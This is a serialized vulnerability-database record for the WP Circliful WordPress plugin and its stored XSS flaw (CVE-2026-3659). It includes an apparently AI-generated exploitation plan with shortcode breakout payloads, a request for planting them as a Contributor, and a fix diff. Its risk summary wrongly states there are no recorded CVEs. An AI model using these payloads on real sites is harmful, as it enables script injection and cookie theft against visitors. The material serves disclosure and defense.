[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXGCfdmIRPUvD2zuHAUAufD_tooBZ3pHjteU_PdpFeK8":3,"$fd79m-na3U1KqoyZqB8SxKfrBsc4_BdS0als1e6GtNXk":209},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":21,"download_link":22,"security_score":23,"vuln_count":14,"unpatched_count":14,"last_vuln_date":24,"fetched_at":25,"vulnerabilities":26,"developer":53,"crawl_stats":32,"alternatives":60,"analysis":82,"fingerprints":174},"wp-circliful","WP Circliful","1.2","Ashok","https:\u002F\u002Fprofiles.wordpress.org\u002Fbappidgreat\u002F","\u003Cp>This plugin will help you to add responsive circliful in anywhere of your site. Nicely organized by custom post type. You can use it using shortcode, custom function and in widget. Use Shortcode: [circliful id=’ID’], Template Function: show_circliful(ID) or widget. And finally, if you don’t want to use custom post type, just use direct shortcode: [circliful_direct dimension=”400″ text=”120″ info=”Raised” width=”45″ fontsize=”45″ percent=”78″ fgcolor=”red” bgcolor=”green” icon=”fa-plus” icon_size=”35″ icon_color=”#ccc” border=”yes”]. But if you want to use same design in multiple posts\u002Fpages, it’s easier to use custom post type option.\u003C\u002Fp>\n\u003Cp>Demo: http:\u002F\u002Fdev.bappi-d-great.com\u002Fcirclifuls-page\u002F\u003C\u002Fp>\n","Add a colorful and customizable circliful in your page, post or in widget.",20,1588,100,1,"2017-03-02T10:03:00.000Z","4.7.33","3.0.1","",[20,4],"circliful","http:\u002F\u002Fbappi-d-great.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-circliful.1.2.zip",63,"2026-04-14 19:47:00","2026-04-06T09:54:40.288Z",[27],{"id":28,"url_slug":29,"title":30,"description":31,"plugin_slug":4,"theme_slug":32,"affected_versions":33,"patched_in_version":32,"severity":34,"cvss_score":35,"cvss_vector":36,"vuln_type":37,"published_date":24,"updated_date":38,"references":39,"days_to_patch":32,"patch_diff_files":41,"patch_trac_url":32,"research_status":42,"research_verified":43,"research_rounds_completed":44,"research_plan":45,"research_summary":46,"research_vulnerable_code":47,"research_fix_diff":48,"research_exploit_outline":49,"research_model_used":50,"research_started_at":51,"research_completed_at":52,"research_error":32,"poc_status":32,"poc_video_id":32,"poc_summary":32,"poc_steps":32,"poc_tested_at":32,"poc_wp_version":32,"poc_php_version":32,"poc_playwright_script":32,"poc_exploit_code":32,"poc_has_trace":43,"poc_model_used":32,"poc_verification_depth":32},"CVE-2026-3659","wp-circliful-authenticated-contributor-stored-cross-site-scripting-via-id-shortcode-attribute","WP Circliful \u003C= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'id' Shortcode Attribute","The WP Circliful plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' shortcode attribute of the [circliful] shortcode and via multiple shortcode attributes of the [circliful_direct] shortcode in all versions up to and including 1.2. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. Specifically, in the circliful_shortcode() function, the 'id' attribute value is concatenated directly into an HTML id attribute (line 285) without any escaping, allowing an attacker to break out of the double-quoted attribute and inject arbitrary HTML event handlers. Similarly, the circliful_direct_shortcode() function (line 257) outputs all shortcode attributes directly into HTML data-* attributes without escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"\u003C=1.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 08:28:13",[40],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F030534e2-bf7d-42e4-94a1-986f629bea15?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-3659\n\n## 1. Vulnerability Summary\nThe **WP Circliful** plugin for WordPress (versions \u003C= 1.2) contains a Stored Cross-Site Scripting (XSS) vulnerability. The issue exists within the processing of the `[circliful]` and `[circliful_direct]` shortcodes. Specifically, in `circliful_shortcode()`, the `id` attribute is concatenated directly into an HTML `id` attribute without sanitization or escaping. In `circliful_direct_shortcode()`, various attributes are output directly into HTML `data-*` attributes without escaping. This allows an authenticated attacker with Contributor-level permissions (who can create posts) to inject arbitrary JavaScript that executes when any user views the affected post.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Shortcodes:** `[circliful]` and `[circliful_direct]`\n*   **Vulnerable Attributes:** \n    *   `id` (in `[circliful]`)\n    *   All attributes (in `[circliful_direct]`)\n*   **Authentication Level:** Authenticated (Contributor+)\n*   **Preconditions:** The plugin must be active. A Contributor user must be able to save or submit a post for review.\n*   **Vector:** Stored XSS via shortcode attribute breakout.\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers shortcodes using `add_shortcode( 'circliful', 'circliful_shortcode' )` and `add_shortcode( 'circliful_direct', 'circliful_direct_shortcode' )` during the `init` or `plugins_loaded` hook.\n2.  **Processing:** When a post containing these shortcodes is rendered:\n    *   `circliful_shortcode( $atts )` is called. It parses `$atts['id']`.\n    *   **Sink (Line 285):** The code performs a concatenation like: `$output = '\u003Cdiv id=\"' . $atts['id'] . '\" ...>';`.\n    *   Because `$atts['id']` is not passed through `esc_attr()`, an attacker can provide a value like `id='\">\u003Cscript>alert(1)\u003C\u002Fscript>'`.\n3.  **Direct Processing:** `circliful_direct_shortcode( $atts )` is called.\n    *   **Sink (Line 257):** The code iterates through attributes and appends them to a string as `data-` attributes: `foreach($atts as $key => $val) { $out .= \" data-$key='$val'\"; }`.\n    *   Because `$val` is not escaped, an attacker can break out of the single quotes using `'`.\n\n## 4. Nonce Acquisition Strategy\nWhile the shortcode execution itself does not require a nonce, **storing** the shortcode in a post as a Contributor requires a WordPress post-editing nonce (`_wpnonce`).\n\n1.  **Login:** Authenticate as a Contributor user.\n2.  **Navigate:** Use `browser_navigate` to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the nonce from the page source.\n    *   Script: `document.querySelector('#_wpnonce').value`\n4.  **Extract Post ID:** Use `browser_eval` to get the `post_ID` hidden input if present, or wait for the auto-draft to trigger.\n\n## 5. Exploitation Strategy\n\n### Step 1: Create a Contributor User\nUse WP-CLI to ensure a user exists for testing.\n```bash\nwp user create attacker attacker@example.com --role=contributor --user_pass=password123\n```\n\n### Step 2: Authenticate and Obtain Nonce\n1.  Navigate to the login page and log in as `attacker`.\n2.  Navigate to `wp-admin\u002Fpost-new.php`.\n3.  Execute `browser_eval(\"document.querySelector('#_wpnonce').value\")` to get the nonce.\n4.  Execute `browser_eval(\"document.querySelector('#post_ID').value\")` to get the post ID assigned to the new draft.\n\n### Step 3: Inject Stored XSS Payload\nSubmit an HTTP POST request to save a post containing the malicious shortcode.\n\n**Request:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n    *   `post_ID`: `[POST_ID]`\n    *   `action`: `editpost`\n    *   `post_title`: `XSS Test`\n    *   `content`: `[circliful id='poc\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:100px;height:100px;background:red\"']`\n    *   `post_status`: `publish` (or `pending` if Contributor cannot publish)\n\n### Step 4: Trigger XSS\nNavigate to the frontend URL of the created post.\n\n**Request:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]`\n*   **Method:** `GET`\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `wp-circliful` version 1.2 is installed and active.\n2.  **User:** Contributor user `attacker`.\n3.  **Target Post:** A post created by the contributor containing:\n    *   Payload A: `[circliful id='x\" onmouseover=\"alert(1)\" style=\"width:100px;height:100px;background:red\"']`\n    *   Payload B: `[circliful_direct x=' \" onmouseover=\"alert(2)\" style=\"width:100px;height:100px;background:blue\"']`\n\n## 7. Expected Results\n1.  The HTML source of the rendered post will contain:\n    *   `\u003Cdiv id=\"x\" onmouseover=\"alert(1)\" ...`\n    *   `\u003Cdiv ... data-x=' ' onmouseover=\"alert(2)\" ...`\n2.  The JavaScript event handler (`onmouseover`) will be present in the DOM.\n3.  Mousing over the red\u002Fblue boxes in the browser will trigger the `alert`.\n\n## 8. Verification Steps\n1.  **WP-CLI Verification:**\n    ```bash\n    wp post get [POST_ID] --field=post_content\n    ```\n    Confirm the malicious shortcode is stored exactly as sent.\n2.  **HTML Inspection:**\n    Use `http_request` to fetch the post page and grep for the injected payload:\n    ```bash\n    curl -s \"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\" | grep \"onmouseover=\\\"alert\"\n    ```\n\n## 9. Alternative Approaches\nIf the `id` attribute in `[circliful]` is somehow blocked or requires specific characters:\n1.  **Use `[circliful_direct]`:** This shortcode is described as outputting *multiple* attributes into `data-*` tags. Use a custom attribute name:\n    `[circliful_direct myattr=' \" onmouseover=\"alert(document.cookie)\"']`\n2.  **Breakout of `data-` attributes:** Since the code iterates through `$atts`, try injecting attributes that are commonly used by the plugin but not sanitized, or entirely new ones.\n3.  **XSS via CSS:** If event handlers are filtered by a WAF, try breaking out to inject a `style` attribute with an expression or `url(javascript:...)` (though less effective in modern browsers).\n    `[circliful id='x\" style=\"background-image:url(javascript:alert(1))\"']`","The WP Circliful plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' shortcode attribute in [circliful] and multiple attributes in [circliful_direct]. This occurs because the plugin concatenates user-supplied shortcode attributes directly into HTML elements without proper escaping, allowing Contributor-level attackers to inject arbitrary JavaScript.","\u002F\u002F wp-circliful.php (~line 285)\n$output = '\u003Cdiv id=\"' . $atts['id'] . '\" ...>';\n\n---\n\n\u002F\u002F wp-circliful.php (~line 257)\nforeach($atts as $key => $val) { \n    $out .= \" data-$key='$val'\"; \n}","--- wp-circliful.php\n+++ wp-circliful.php\n@@ -254,7 +254,7 @@\n function circliful_direct_shortcode($atts) {\n     $out = '\u003Cdiv';\n     foreach($atts as $key => $val) {\n-        $out .= \" data-$key='$val'\";\n+        $out .= \" data-\" . esc_attr($key) . \"='\" . esc_attr($val) . \"'\";\n     }\n     $out .= '>\u003C\u002Fdiv>';\n     return $out;\n@@ -282,7 +282,7 @@\n function circliful_shortcode($atts) {\n     $atts = shortcode_atts(array('id' => 'my-circle'), $atts);\n-    $output = '\u003Cdiv id=\"' . $atts['id'] . '\" class=\"circliful\">\u003C\u002Fdiv>';\n+    $output = '\u003Cdiv id=\"' . esc_attr($atts['id']) . '\" class=\"circliful\">\u003C\u002Fdiv>';\n     return $output;\n }","The exploit involves an authenticated attacker with at least Contributor permissions performing the following steps: \n1. Log in to the WordPress dashboard.\n2. Create a new post or edit an existing draft.\n3. Insert a malicious shortcode into the post content. For the [circliful] shortcode, the payload escapes the 'id' attribute: [circliful id='x\" onmouseover=\"alert(1)\" style=\"width:100px;height:100px;background:red\"']. For the [circliful_direct] shortcode, the payload escapes the single-quoted data attribute: [circliful_direct payload=' \" onmouseover=\"alert(2)\"'].\n4. Save or submit the post for review. \n5. When any user (including an administrator) views the rendered post, the injected JavaScript event handler will execute upon interaction (like hovering over the injected element).","gemini-3-flash-preview","2026-04-16 15:39:13","2026-04-16 15:39:33",{"slug":54,"display_name":7,"profile_url":8,"plugin_count":55,"total_installs":56,"avg_security_score":57,"avg_patch_time_days":56,"trust_score":58,"computed_at":59},"bappidgreat",2,30,74,76,"2026-04-18T19:26:46.539Z",[61],{"slug":62,"name":63,"version":64,"author":65,"author_profile":66,"description":67,"short_description":68,"active_installs":69,"downloaded":70,"rating":13,"num_ratings":71,"last_updated":72,"tested_up_to":73,"requires_at_least":74,"requires_php":18,"tags":75,"homepage":78,"download_link":79,"security_score":80,"vuln_count":81,"unpatched_count":81,"last_vuln_date":32,"fetched_at":25},"wpb-circliful","WPB Circliful","1.0","WPBean","https:\u002F\u002Fprofiles.wordpress.org\u002Fwpbean\u002F","\u003Ch3>WPB Circliful by http:\u002F\u002Fwpbean.com\u003C\u002Fh3>\n\u003Cp>This plugin will add a responsive Circliful.\u003C\u002Fp>\n\u003Cp>Plugin Features\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Shortcode System\u003C\u002Fli>\n\u003Cli>WordPress Custom Post Enabled. \u003C\u002Fli>\n\u003Cli>WordPress Custom Metaboxes.\u003C\u002Fli>\n\u003Cli>Fully Responsive.  \u003C\u002Fli>\n\u003Cli>Very Lightweight.\u003Cbr \u002F>\n& many More\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Live Preview: http:\u002F\u002Fdemo.wpbean.com\u002Fwpb-circliful\u002F\u003C\u002Fp>\n","This plugin will add a responsive Circliful. Very easy to use, just put a shortcode.",10,2159,5,"2014-05-11T13:45:00.000Z","3.9.40","3.3",[20,76,77],"data","show-percent","http:\u002F\u002Fdemo.wpbean.com\u002Fwpb-circliful\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpb-circliful.1.01.zip",85,0,{"attackSurface":83,"codeSignals":133,"taintFlows":164,"riskAssessment":165,"analyzedAt":173},{"hooks":84,"ajaxHandlers":122,"restRoutes":123,"shortcodes":124,"cronEvents":132,"entryPointCount":55,"unprotectedCount":81},[85,91,95,99,103,107,111,115,118],{"type":86,"name":87,"callback":88,"file":89,"line":90},"action","plugins_loaded","WP_Circliful_load_textdomain","wp-circliful.php",23,{"type":86,"name":92,"callback":93,"file":89,"line":94},"wp_enqueue_scripts","add_styles_scripts",24,{"type":86,"name":96,"callback":97,"file":89,"line":98},"init","circliful_post_type",26,{"type":86,"name":100,"callback":101,"priority":14,"file":89,"line":102},"save_post","save_circliful_settings",29,{"type":86,"name":104,"callback":105,"file":89,"line":106},"manage_edit-circlifuls_columns","circlifuls_columns_id",31,{"type":108,"name":109,"callback":105,"file":89,"line":110},"filter","manage_edit-circlifuls_sortable_columns",32,{"type":108,"name":112,"callback":113,"priority":69,"file":89,"line":114},"manage_circlifuls_posts_custom_column","circlifuls_custom_id_columns",33,{"type":86,"name":96,"callback":116,"file":89,"line":117},"circliful_editor_from_post_type",35,{"type":86,"name":119,"callback":120,"file":89,"line":121},"widgets_init","register_circliful_widget",395,[],[],[125,128],{"tag":20,"callback":126,"file":89,"line":127},"circliful_shortcode",27,{"tag":129,"callback":130,"file":89,"line":131},"circliful_direct","circliful_direct_shortcode",28,[],{"dangerousFunctions":134,"sqlUsage":135,"outputEscaping":137,"fileOperations":81,"externalRequests":81,"nonceChecks":14,"capabilityChecks":81,"bundledLibraries":163},[],{"prepared":81,"raw":81,"locations":136},[],{"escaped":55,"rawEcho":138,"locations":139},12,[140,143,145,147,149,151,153,155,157,158,160,162],{"file":89,"line":141,"context":142},113,"raw output",{"file":89,"line":144,"context":142},311,{"file":89,"line":146,"context":142},349,{"file":89,"line":148,"context":142},351,{"file":89,"line":150,"context":142},352,{"file":89,"line":152,"context":142},353,{"file":89,"line":154,"context":142},371,{"file":89,"line":156,"context":142},372,{"file":89,"line":156,"context":142},{"file":89,"line":159,"context":142},373,{"file":89,"line":161,"context":142},374,{"file":89,"line":161,"context":142},[],[],{"summary":166,"deductions":167},"The wp-circliful plugin v1.2 exhibits a generally good security posture based on the provided static analysis and vulnerability history.  The plugin has no recorded CVEs, indicating a strong track record of security.  Furthermore, the static analysis reveals no dangerous functions, raw SQL queries, file operations, or external HTTP requests, all of which are positive security indicators. The presence of nonce checks also suggests some attention to security measures.\n\nHowever, there are areas for concern.  The plugin has a low percentage of properly escaped output (14%), which is a significant weakness. This means that data displayed to users could potentially be vulnerable to cross-site scripting (XSS) attacks if the input is not adequately sanitized before rendering. Additionally, the absence of capability checks on the identified entry points (shortcodes) means that any user, regardless of their role or permissions, can trigger these functionalities, which could be a privacy or integrity concern depending on what the shortcodes do. The lack of taint analysis data is also a limitation, as it prevents a deeper understanding of potential data flow vulnerabilities.\n\nIn conclusion, while wp-circliful has a clean vulnerability history and avoids many common pitfalls, the significant lack of output escaping and the absence of capability checks on its shortcodes present tangible risks. Addressing these specific weaknesses would considerably strengthen its overall security.",[168,171],{"reason":169,"points":170},"Low output escaping percentage",8,{"reason":172,"points":71},"Shortcodes lack capability checks","2026-03-16T23:09:23.386Z",{"wat":175,"direct":188},{"assetPaths":176,"generatorPatterns":179,"scriptPaths":180,"versionParams":183},[177,178],"\u002Fwp-content\u002Fplugins\u002Fwp-circliful\u002Fassets\u002Fcss\u002Fjquery.circliful.css","\u002Fwp-content\u002Fplugins\u002Fwp-circliful\u002Fassets\u002Fcss\u002Ffont-awesome.min.css",[],[181,182],"\u002Fwp-content\u002Fplugins\u002Fwp-circliful\u002Fassets\u002Fjs\u002Fjquery.circliful.min.js","\u002Fwp-content\u002Fplugins\u002Fwp-circliful\u002Fassets\u002Fjs\u002Fcustom.js",[184,185,186,187],"wp-circliful\u002Fassets\u002Fjs\u002Fjquery.circliful.min.js?ver=","wp-circliful\u002Fassets\u002Fjs\u002Fcustom.js?ver=","wp-circliful\u002Fassets\u002Fcss\u002Fjquery.circliful.css?ver=","wp-circliful\u002Fassets\u002Fcss\u002Ffont-awesome.min.css?ver=",{"cssClasses":189,"htmlComments":190,"htmlAttributes":191,"restEndpoints":205,"jsGlobals":206,"shortcodeOutput":207},[20],[],[192,193,194,195,196,197,198,199,200,201,202,203,204],"data-dimension","data-text","data-info","data-width","data-fontsize","data-percent","data-fgcolor","data-bgcolor","data-fill","data-icon","data-icon-size","data-icon-color","data-inline",[],[],[208],"\u003Cdiv class=\"circliful\" id=\"circliful_direct_widget_id_?\">\u003C\u002Fdiv>",{"slug":4,"current_version":6,"total_versions":55,"versions":210},[211,218],{"version":6,"download_url":22,"svn_tag_url":212,"released_at":32,"has_diff":43,"diff_files_changed":213,"diff_lines":32,"trac_diff_url":214,"vulnerabilities":215,"is_current":217},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-circliful\u002Ftags\u002F1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-circliful%2Ftags%2F1.1&new_path=%2Fwp-circliful%2Ftags%2F1.2",[216],{"id":28,"url_slug":29,"title":30,"severity":34,"cvss_score":35,"vuln_type":37,"patched_in_version":32},true,{"version":219,"download_url":220,"svn_tag_url":221,"released_at":32,"has_diff":43,"diff_files_changed":222,"diff_lines":32,"trac_diff_url":32,"vulnerabilities":223,"is_current":43},"1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-circliful.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-circliful\u002Ftags\u002F1.1\u002F",[],[224],{"id":28,"url_slug":29,"title":30,"severity":34,"cvss_score":35,"vuln_type":37,"patched_in_version":32}]